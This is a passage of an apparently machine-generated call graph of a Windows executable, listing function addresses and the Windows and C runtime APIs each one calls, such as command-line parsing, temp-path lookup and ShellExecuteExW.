9204->9216 9222 40b880 9204->9222 9205 40cd0e ??3@YAXPAX 9205->9092 9211 401d13 free 9210->9211 9212 409f1a 9211->9212 9212->9205 9214 401d01 VirtualFree 9213->9214 9215 401d12 9213->9215 9214->9215 9215->9205 9217 40c805 9216->9217 9218 401d13 free 9217->9218 9219 40c80e 9218->9219 9220 40c830 9219->9220 9221 40c827 ??3@YAXPAX 9219->9221 9220->9205 9221->9220 9223 40b8a6 9222->9223 9224 401d13 free 9223->9224 9225 40b8cc 9224->9225 9225->9205 9227 40cdda ctype 3 API calls 9226->9227 9228 40e21c 9227->9228 9229 40cdda ctype 3 API calls 9228->9229 9230 40e224 9229->9230 9231 40cdda ctype 3 API calls 9230->9231 9232 40e22c 9231->9232 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9868 401d21 GetModuleHandleW CreateWindowExW 9513->9868 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9871 4044c6 9523->9871 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9880 402dd6 9529->9880 9531 405802 9894 4043f8 9531->9894 9535 405821 _wtol 9537 405837 9535->9537 9899 404903 #17 9537->9899 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10129 404e99 9541->10129 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10146 404513 9545->10146 10151 4052a7 9546->10151 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9563 405872 9557->9563 9570 405947 9558->9570 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9567 405b00 9562->9567 9563->9545 9564 405a05 9564->9563 9565 405a38 9564->9565 9569 405a21 _wtol 9564->9569 9566 4043f8 3 API calls 9565->9566 9578 405a97 9566->9578 9568 405b85 9567->9568 9572 401370 2 API calls 9567->9572 9925 4023a0 9568->9925 9569->9565 9570->9559 9570->9563 9570->9564 9570->9565 9577 401526 2 API calls 9570->9577 9574 405b35 9572->9574 9576 401370 2 API calls 9574->9576 9575 401370 2 API calls 9579 405bab ??2@YAPAXI 9575->9579 9583 405b4b 9576->9583 9577->9570 9578->9559 9580 404a97 2 API calls 9578->9580 9581 405bb7 9579->9581 9582 405ac8 9580->9582 9928 40c9d7 9581->9928 9582->9559 9584 4013a9 2 API calls 9582->9584 9585 4013a9 2 API calls 9583->9585 9584->9559 9586 405b75 9585->9586 9588 402187 19 API calls 9586->9588 9590 405b7c 9588->9590 9593 4027c2 2 API calls 9590->9593 9591 405be4 9594 408dbf 57 API calls 9591->9594 9592 405c0a 9931 402823 9592->9931 9593->9568 9594->9563 9598 405c1f 9599 405c25 9598->9599 9600 405c49 9598->9600 9602 408dbf 57 API calls 9599->9602 9601 405cdb 9600->9601 9604 4043f8 3 API calls 9600->9604 9605 40cdda ctype 3 API calls 9601->9605 9603 405c2d ??3@YAXPAX 9602->9603 9603->9563 9606 405c60 9604->9606 9607 405ce3 9605->9607 9606->9601 9616 405c66 9606->9616 9608 405d08 9607->9608 9965 403400 9607->9965 9610 405d11 9608->9610 9611 405cbf ??3@YAXPAX 9608->9611 9614 405d82 9610->9614 9615 405d1d wsprintfW 9610->9615 9621 401458 2 API calls 9610->9621 9624 401370 ??2@YAPAXI ??3@YAXPAX 9610->9624 9626 402187 19 API calls 9610->9626 10185 4032d9 ??2@YAPAXI 9610->10185 10191 40269a ??3@YAXPAX ??3@YAXPAX 9610->10191 9611->9563 9613 405cfd ??3@YAXPAX 9613->9563 9994 404b06 9614->9994 9618 401458 2 API calls 9615->9618 9616->9611 10159 4054c1 9616->10159 9618->9610 9620 405c95 9620->9611 9622 405c9b 9620->9622 9621->9610 9623 408dbf 57 API calls 9622->9623 9625 405ca3 ??3@YAXPAX 9623->9625 9624->9610 9625->9563 9626->9610 9627 406006 9628 404b06 26 API calls 9627->9628 9629 406015 9628->9629 9631 40619d 9629->9631 10217 40244e AllocateAndInitializeSid 9629->10217 10053 4026b0 9631->10053 9636 40624e 10056 4045f4 9636->10056 9638 40603a 9641 401458 2 API calls 9638->9641 9639 402771 2 API calls 9682 4061b5 9639->9682 9643 406042 9641->9643 9646 401458 2 API calls 9643->9646 9644 4062e1 CoInitialize 9652 4026b0 lstrcmpW 9644->9652 9645 406275 9648 4026b0 lstrcmpW 9645->9648 9649 40604a GetCommandLineW 9646->9649 9651 406284 9648->9651 9653 404a97 2 API calls 9649->9653 9650 406250 ??3@YAXPAX 9650->9636 9654 406294 9651->9654 9658 402187 19 API calls 9651->9658 9655 406307 9652->9655 9656 40605a 9653->9656 10226 4041ab 9654->10226 9659 40631b 9655->9659 9662 401370 2 API calls 9655->9662 9660 402771 2 API calls 9656->9660 9657 401458 ??2@YAPAXI ??3@YAXPAX 9657->9682 9658->9654 9664 4041c4 16 API calls 9659->9664 9663 406065 9660->9663 9662->9659 9668 4048a9 2 API calls 9663->9668 9669 406321 9664->9669 9666 4013a9 2 API calls 9666->9682 9667 40421b lstrlenW lstrlenW _wcsnicmp 9675 405d8b 9667->9675 9671 406083 9668->9671 9672 4026b0 lstrcmpW 9669->9672 9670 407ce8 22 API calls 9673 4062b7 9670->9673 9676 4048c7 2 API calls 9671->9676 9677 406330 9672->9677 10229 407a5b ??3@YAXPAX 9673->10229 9674 401370 2 API calls 9674->9682 9675->9627 9675->9667 9699 405f6a _wtol 9675->9699 9726 40614a ??3@YAXPAX 9675->9726 10192 404d50 9675->10192 10203 40464b 9675->10203 9683 406090 9676->9683 9679 406344 9677->9679 9680 406337 _wtol 9677->9680 9684 40636a 9679->9684 10230 408f81 9679->10230 9680->9679 9681 4062c2 ??3@YAXPAX 9681->9563 9682->9636 9682->9639 9682->9650 9682->9657 9682->9666 9682->9674 9685 4032d9 7 API calls 9682->9685 10225 40269a ??3@YAXPAX ??3@YAXPAX 9682->10225 9686 4048c7 2 API calls 9683->9686 9689 40637e 9684->9689 9691 406355 ??3@YAXPAX 9684->9691 10246 408eb4 9684->10246 9685->9682 9687 40609d 9686->9687 10220 4048e5 9687->10220 9701 401458 2 API calls 9689->9701 9705 406503 ??3@YAXPAX 9689->9705 9706 4063bc GetKeyState 9689->9706 9710 406563 9689->9710 9711 401370 ??2@YAPAXI ??3@YAXPAX 9689->9711 9712 4026b0 lstrcmpW 9689->9712 9718 401526 ??2@YAPAXI ??3@YAXPAX 9689->9718 9727 406520 9689->9727 9729 406553 ??3@YAXPAX ??3@YAXPAX 9689->9729 9730 4064f8 ??3@YAXPAX 9689->9730 10273 408461 9689->10273 10286 4084df 9689->10286 9691->9684 9695 40622b ??3@YAXPAX 9697 4026b0 lstrcmpW 9695->9697 9696 401551 2 API calls 9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10062 404545 9714->10062 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10075 40172c ??2@YAPAXI 9736->10075 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 9832->9833 9834 4041f8 20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10092 40241d 9835->10092 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10101 4048a9 9845->10101 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10111 404f67 9860->10111 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9885 401526 ??2@YAPAXI ??3@YAXPAX 9885->9887 9887->9882 9887->9885 9888 401458 2 API calls 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 402823 2 API calls 9965->9966 9987 403415 9966->9987 9967 4036b4 ??3@YAXPAX 9968 4036eb 9967->9968 9968->9608 9968->9613 9969 401458 ??2@YAPAXI ??3@YAXPAX 9969->9987 9970 402823 2 API calls 9970->9987 9971 4013a9 2 API calls 9972 403486 ??3@YAXPAX ??3@YAXPAX 9971->9972 9973 4036c0 9972->9973 9972->9987 10535 402d30 9973->10535 9977 4036e1 ??3@YAXPAX 9977->9968 9978 403593 strncmp 9979 40357e strncmp 9978->9979 9978->9987 9979->9978 9979->9987 9982 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9982->9987 9983 4013a9 2 API calls 9984 403600 ??3@YAXPAX 9983->9984 9986 402dd6 9 API calls 9984->9986 9985 40292b 2 API calls 9985->9979 9988 403611 lstrcmpW 9986->9988 9987->9967 9987->9969 9987->9970 9987->9971 9987->9973 9987->9978 9987->9982 9987->9983 9987->9985 9989 40292b ??2@YAPAXI ??3@YAXPAX 9987->9989 9990 403648 lstrlenW wcsncmp 9987->9990 9992 4032d9 7 API calls 9987->9992 9993 401370 2 API calls 9987->9993 10526 402662 9987->10526 10530 40261a 9987->10530 10534 40269a ??3@YAXPAX ??3@YAXPAX 9987->10534 9988->9987 9989->9987 9990->9987 9992->9987 9993->9987 9995 4026b0 lstrcmpW 9994->9995 9996 404b1f 9995->9996 9997 404b6f 9996->9997 9999 401370 2 API calls 9996->9999 9998 4026b0 lstrcmpW 9997->9998 10000 404b8d 9998->10000 10001 404b36 9999->10001 10003 4026b0 lstrcmpW 10000->10003 10002 402187 19 API calls 10001->10002 10004 404b3d 10002->10004 10005 404ba5 10003->10005 10006 4027c2 2 API calls 10004->10006 10008 4026b0 lstrcmpW 10005->10008 10007 404b46 10006->10007 10009 401370 2 API calls 10007->10009 10010 404bbd 10008->10010 10011 404b5f 10009->10011 10013 4026b0 lstrcmpW 10010->10013 10012 402187 19 API calls 10011->10012 10014 404b66 10012->10014 10015 404bd5 10013->10015 10016 4027c2 2 API calls 10014->10016 10017 404bec 10015->10017 10018 404bdc lstrcmpiW 10015->10018 10016->9997 10019 4026b0 lstrcmpW 10017->10019 10018->10017 10020 404c02 10019->10020 10021 4026b0 lstrcmpW 10020->10021 10022 404c2f 10021->10022 10023 404c3c 10022->10023 10554 4043a6 10022->10554 10025 4026b0 lstrcmpW 10023->10025 10029 404c50 10025->10029 10026 404c70 10028 4026b0 lstrcmpW 10026->10028 10035 404c83 10028->10035 10029->10026 10030 4026b0 lstrcmpW 10029->10030 10558 40434d 10029->10558 10030->10029 10031 404ca3 10032 4026b0 lstrcmpW 10031->10032 10034 404caf 10032->10034 10036 4026b0 lstrcmpW 10034->10036 10035->10031 10037 4026b0 lstrcmpW 10035->10037 10562 40437e 10035->10562 10038 404cc0 10036->10038 10037->10035 10039 4026b0 lstrcmpW 10038->10039 10040 404cd1 10039->10040 10041 404ce7 10040->10041 10042 404cde _wtol 10040->10042 10043 4026b0 lstrcmpW 10041->10043 10042->10041 10044 404cf3 10043->10044 10045 404d03 10044->10045 10046 404cfa _wtol 10044->10046 10047 4026b0 lstrcmpW 10045->10047 10046->10045 10048 404d0f 10047->10048 10049 4026b0 lstrcmpW 10048->10049 10050 404d27 10049->10050 10051 4026b0 lstrcmpW 10050->10051 10052 404d3f 10051->10052 10052->9675 10054 40261a lstrcmpW 10053->10054 10055 4026c1 10054->10055 10055->9682 10057 404648 10056->10057 10059 404605 10056->10059 10057->9644 10057->9645 10058 40133e 2 API calls 10058->10059 10059->10058 10060 4041f8 20 API calls 10059->10060 10061 404622 SetEnvironmentVariableW ??3@YAXPAX 10060->10061 10061->10057 10061->10059 10063 401458 2 API calls 10062->10063 10064 404556 10063->10064 10065 4027aa 2 API calls 10064->10065 10066 40455f GetTempPathW 10065->10066 10067 404578 10066->10067 10072 40458f 10066->10072 10068 4027aa 2 API calls 10067->10068 10069 404583 GetTempPathW 10068->10069 10069->10072 10070 4027aa 2 API calls 10071 4045b2 wsprintfW 10070->10071 10071->10072 10072->10070 10073 4045c9 GetFileAttributesW 10072->10073 10074 4045ed 10072->10074 10073->10072 10073->10074 10074->9722 10076 401745 10075->10076 10091 40d041 3 API calls 10076->10091 10077 401769 10078 401794 10077->10078 10570 40110a 10077->10570 10080 408dbf 57 API calls 10078->10080 10084 40179c 10080->10084 10082 4017bc 10083 4017d4 ??2@YAPAXI 10082->10083 10085 4036f1 88 API calls 10082->10085 10086 4017e0 10083->10086 10087 4017e7 10083->10087 10084->9739 10088 4017cf 10085->10088 10593 401470 10086->10593 10574 401611 10087->10574 10088->10083 10088->10084 10091->10077 10093 402426 10092->10093 10094 40242b 10092->10094 10093->9840 10095 40236f 3 API calls 10094->10095 10096 402430 10095->10096 10097 402441 10096->10097 10098 40243a 10096->10098 10097->9840 11011 4023e9 LoadLibraryA GetProcAddress 10098->11011 10102 4044c6 2 API calls 10101->10102 10103 4048b7 10102->10103 10104 401429 2 API calls 10103->10104 10105 4048c2 10104->10105 10106 4048c7 10105->10106 10107 40133e 2 API calls 10106->10107 10108 4048d5 10107->10108 10109 4027c2 2 API calls 10108->10109 10110 4048e0 10109->10110 10110->9858 10112 401458 2 API calls 10111->10112 10113 404f78 10112->10113 10114 401458 2 API calls 10113->10114 10115 404f80 memset 10114->10115 10116 404fae 10115->10116 10117 404a97 2 API calls 10116->10117 10118 404fd1 10117->10118 10119 401370 2 API calls 10118->10119 10120 404fdc 10119->10120 10121 404fe1 ??3@YAXPAX 10120->10121 10122 404ffa ShellExecuteExW 10120->10122 10123 404fec ??3@YAXPAX 10121->10123 10124 405014 10122->10124 10125 40503a 10122->10125 10123->9864 10126 405028 CloseHandle 10124->10126 10127 40501d WaitForSingleObject 10124->10127 10128 405031 ??3@YAXPAX 10125->10128 10126->10128 10127->10126 10128->10123 10130 407c87 4 API calls 10129->10130 10131 404eb5 10130->10131 10132 402187 19 API calls 10131->10132 10133 404ec3 10132->10133 10134 402771 2 API calls 10133->10134 10135 404ecd 10134->10135 10136 404f03 wsprintfW 10135->10136 10138 4027c2 ??2@YAPAXI ??3@YAXPAX 10135->10138 10137 4027c2 2 API calls 10136->10137 10139 404f31 10137->10139 10138->10135 10140 4027c2 2 API calls 10139->10140 10141 404f3e 10140->10141 10142 407ce8 22 API calls 10141->10142 10143 404f53 ??3@YAXPAX 10142->10143 11013 407a5b ??3@YAXPAX 10143->11013 10145 404f64 10145->9563 10147 40cdda ctype 3 API calls 10146->10147 10148 404521 10147->10148 10149 40ccfd ctype 3 API calls 10148->10149 10150 40ce45 ??3@YAXPAX 10149->10150 10150->9551 10152 4052b4 10151->10152 10158 4052d0 10151->10158 10155 4052c6 _wtol 10152->10155 10152->10158 10153 404f67 9 API calls 10154 4052f3 10153->10154 10156 405301 10154->10156 10157 4052fb GetLastError 10154->10157 10155->10158 10156->9563 10157->10156 10158->10153 10160 40ca5c 2 API calls 10159->10160 10161 4054ed 10160->10161 10162 405549 10161->10162 10164 402771 2 API calls 10161->10164 10163 402823 2 API calls 10162->10163 10165 405551 10163->10165 10170 4054fc 10164->10170 10166 4028b9 2 API calls 10165->10166 10167 40555e 10166->10167 10168 402953 2 API calls 10167->10168 10172 40556b 10168->10172 10169 4055ba ??3@YAXPAX 10175 4055b6 10169->10175 10170->10169 10171 4036f1 88 API calls 10170->10171 10173 405520 10171->10173 10174 402953 2 API calls 10172->10174 10173->10169 10177 40ca5c 2 API calls 10173->10177 10176 405578 10174->10176 10175->9620 10178 402953 2 API calls 10176->10178 10180 40553c 10177->10180 10179 405585 10178->10179 10181 40d0a5 2 API calls 10179->10181 10180->10169 10182 405540 ??3@YAXPAX 10180->10182 10183 405599 10181->10183 10182->10162 10183->10169 10184 4055a2 ??3@YAXPAX 10183->10184 10184->10175 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 10339 405106 10338->10339 10340 4048c7 2 API calls 